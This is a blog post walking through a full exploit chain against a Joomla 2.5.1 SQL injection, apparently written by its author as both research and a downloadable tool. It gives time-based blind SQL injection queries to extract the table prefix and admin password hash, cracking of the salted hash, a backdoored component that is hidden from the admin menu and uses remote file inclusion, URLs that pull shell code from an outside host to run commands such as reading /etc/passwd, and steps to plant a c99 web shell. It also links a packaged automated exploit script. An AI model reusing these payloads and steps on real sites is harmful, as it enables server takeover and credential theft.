And of course if you want everything -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_all.zip

Essentially the only modification you need to do is within the interface / cron tasks modify the ‘setDB.php’ script with your db credentials and within the scraping script, set these on line 141.

-AM

Overview

So back in the dark ages of my programming life I, like many people who started coding, worked in web development. And during these times I had to write modules/hack things together for various frameworks, including Joomla. At that stage i was also signed up to the Joomla security security list and a few weeks ago i saw a security update come through that affected most joomla installs and was a core issue. Most of the ‘omgjoomlasux’ commercials/vulns/notifcations actually are problems with 3rd party modules rather than with joomla itself, so this was pretty interesting. Secondly the bug was listed as a SQL injection bug and critical, this gave me the idea that with a bit of luck and some mysql commands I too could hack the planet. I fired up my green_text_on_black_background console and gave it a whirl.

First i pulled Joomla installs 2.5.1 and 2.5.2 from the download page (the issue had just been patched), next I had to go through these to figure out what changed. Doing a quick diff in linux, or for windows people use the cool winmerge it was quick and painless to find the issue:

Winmerge with Diff of 2.51 and 2.52

./plugins/system/redirect/redirect.php:

Joomla251:
$db->setQuery(‘select id from ‘.$db->quoteName(‘#__redirect_links’).” where old_url=’”.$current.”‘”);

Joomla252:
$db->setQuery(‘select id from ‘.$db->quoteName(‘#__redirect_links’).” where old_url=’” . $db->quote($current) . “‘”);

So right off the mark, things are looking great, got a SQL command that is not escaped via the $current variable. A quick search to find this in that function gives us:

$current = $uri->toString(array(‘scheme’, ‘host’, ‘port’, ‘path’, ‘query’, ‘fragment’));

Excellent, something we can regularly manipulate with just a browser (since its adding the URI from the browser), so now what could I do with this information?

First off i knew what the SQL query looked like, so it was a lot easier to manipulate in a SQL interface or even something like PhpMyAdmin. So modifying the query quickly gave me some failboats:

1. I couldnt do any insert / modifcation of data from a secondary query like:
- UNION SELECT (insert x into y)
This was due to the fact that insert x into y simple didn’t return anything so it could not be joined to the previous SQL query, the Union requires a returned value to join to the current SQL statement. I tried doing things like SELECTing an INSERT, using the IF statement and a few others without luck.

2. MySQL doesn’t have anything like xp_cmdshell so I could not off-the-bat execute raw code (sadface).

However, MySQL did have a few functions that were super useful:
* INTO DUMPFILE – this lets me write files out to the system (winning.) Unfortunately I have NO IDEA where the webroot is, and in the testing I did MySQL almost never had write access to the webroot when i knew where it was
* SELECT LOAD_FILE – lets me select local files into things – Great apart from the fact that I cannot write into the database and I dont know where I can put files

At this stage it was super-facepalm-time. But then with a little help from Roelof and the internets i started looking at timing attacks.

How the attack works:

* You can add an IF statement into the UNION to evaluate something
* If its true, sleep for a period of time (by default I used 2s more than the average normal request time)
* If false do nothing (so the page returns in a normal time)

So right now I have the ability to essentially ask Joomla a true or false question and get an answer for it. Next was figuring out what I could do with this to get a webshell on a box.

I looked at some of the joomla-y things and found that the easiest way for me to get a shell on the box would be with a simple RFI (loads of components for Joomla already have this, but I figured id rather make a custom component). The only problem is that I didnt have access to the backend because I didnt know the password :/

So next was figuring out how to get the password. Most joomla installs come with a nasty setting that puts a prefix before every table in the database, so while my install has users in c5swv_users, yours might have it in s5fddg_users.. irritating.

So the steps at this stage:
1. Get the prefix for the database
2. Get the admin password out
3. Crack the admin password
4. Login, install component
5. Call the RFI component with your shell.

First things first, figuring out the best way to get data out. Essentially there were two options:

1. Take each character we need to get out to binary, and time out a 8 bits for a single character (8 requests), eg. 00110101 would be in response times,

2. Use a binary tree to try and identify the character, essentially asking something like this:
- Is it between a and z?
- Is it between a and m?
- Is it between t and z?
- Is it between w and z?
- Is it between t and u? (i know it must be either t,u or v at this stage)
- Its V!

I opted for the second option mostly because Roelof suggested it first and also cause it seems sexy :)

So writing the query for those looks something like:
SELECT if((SELECT ORD(singlecharacter) FROM x) between $start and $end,sleep(2),null)

Fetching the prefix:

The prefix can be fetched by doing the query:
SELECT SUBSTRING_INDEX(table_name,’_',1) FROM information_schema.tables WHERE table_schema=database() limit 1

Then I could change it up to do the positioning with something like:
SELECT ORD(SUBSTRING((SUBSTRING_INDEX(table_name,’_',1)),$pos,1)) FROM information_schema.tables WHERE table_schema=database() limit 1

However i first had to get the number of positions, so that was done with a guessing game something like:
Is it 3?
Is it 4?
Is it 5?
Its 5!

And a SQL statement something like:
SELECT if((SELECT LENGTH(SUBSTRING_INDEX(table_name,’_',1)) FROM information_schema.tables WHERE table_schema=database() limit 1) = ,sleep(2),null)

Below you can see it doing this in the script:

Script Running to time out prefix

Admin Hash

Great, so I have prefix and prefix length, now to get the admin hash. Essentially done in the same way as above but with the query SELECT password from #prefix#_users WHERE username=admin

Once I had that out (it takes a while as its a 32 bit hash and a 32 bit salt) I could get on to cracking it.

Joomla passwords by default are MD5(salt + password), and the salt is stored in the password field (thank goodness! If it was in a file somewhere id have really been stuck here).

So brute forcing with the salt eventually gave me the password :) — In the script I only do it up to 6 characters, after that it simply takes too much time to do it in php..

NOTE: I’ve added a -c=1 param for people who wish to do it outside of the script – which seems a lot better since mine is horribly inneficient

Login and Component

So i simply took apart a helloworld component and added the functionality i needed, namely:

include($_GET["url"]);

However this seldomly seems to work as most hosting providers/defaults for PHP have allow_url_include set to 0. Strangely however it seems that I can include local files that i fetch with file_get_contents, so it was simply a case of doing:

$phpShellCode = file_get_contents($_GET["url"]);
$filename = “/tmp/myshell” . rand(0,9999) . “.txt”;
$fh = fopen($filename, ‘w’);
fwrite($fh, $phpShellCode);
fclose($fh);
include($filename);

Additionally the ‘helloworld’ component made a menu item in the backend which we obviously wouldnt want, so I stripped that out (really just removed the files relating to the admin section). By default joomla has loads of components installed and the wizard to uninstall them doesn’t make it very easy to spot the malicious one.

Joomla Extension Manager

So now my component works it was just a matter of hacking together some curl scripts to login, install the component and then allow the user to browse to that page. Joomla has some protection against CSRF so the pages generally had to be regex’d to get all the field data to be posted.

On a side note, one strange thing with Joomla is that after posting data (such as login/upload) the Joomla site would return a 200 and the page would have to be reloaded to get confirmation that it was successful.

PHP Shell:

The PHP shell was a little tricky as i was stuck in a specific part of the page and the way the code got there meant I couldnt _really_ post back to the page, so this excluded all c99-type shells. However putting a little script together meant you could easily get something to be dropped into ../../c99.php and you were A-for-away. I have just included a simple exec script to output the return values of a cmd, so that you can do something like:

index.php?option=com_rfi&url=http://www.andrewmohawk.com/execShellSimple.txt&c=cat /etc/passwd
index.php?option=com_rfi&url=http://www.andrewmohawk.com/execShellSimple.txt&c=whoami
index.php?option=com_rfi&url=http://www.andrewmohawk.com/execShellSimple.txt&c=pwd

And get the responses right in the page:

RFI response in page

Full Shell:

So i added another php include file to help pull files, something like this:

And used this to get a c99 going on my box, essentially just doing something like:

http://www.andrewmohawk.com/phpshells/pullfileLocal.txt&l=/var/www/html/andrewmohawk.com/joomla251/logs/test.php&r=https://web-malware-collection.googlecode.com/svn-history/r3/trunk/Backdoors/PHP/c99.txt

And then browsing to http://andrewmohawk.com/joomla251/logs/test.php

The reason I placed the file in logs is that the Joomla setup usually forces the user to have write access there so it can write out the log files, in fact marking that directory as non writable forces the admin backend to throw an error so you cannot login.

C99 Shell running on box

Scripts / Code:

So i packaged this all (up to installing the RFI component) into an automated PHP script located here -> exploit251.php
And i put the two php helper shell thingies in this directory here ->> www.andrewmohawk.com/phpshells/
Also you will need the RFI component here ->> http://andrewmohawk.com/joomla/com_rfi.zip

Output/Example:

The example of it running is located here: exploitRun.log

Conclusion:

The vulnerability is pretty serious as firstly it can lead to the machine being compromised while now just as the apache user but later with priv. escalation or other attacks as root. Additionally because it is simply a php script, and we are executing php it could be wormed so that each compromised machine looks for another machine to compromise and spreads that way.

Obviously upgrading to the latest Joomla is recommended to avoid this ^_^

However its also important to ask, if something as trivial as escaping/sanitising a user variable is missed in some of the core functionality, how many more have been missed and how much can we really trust the code.

-AM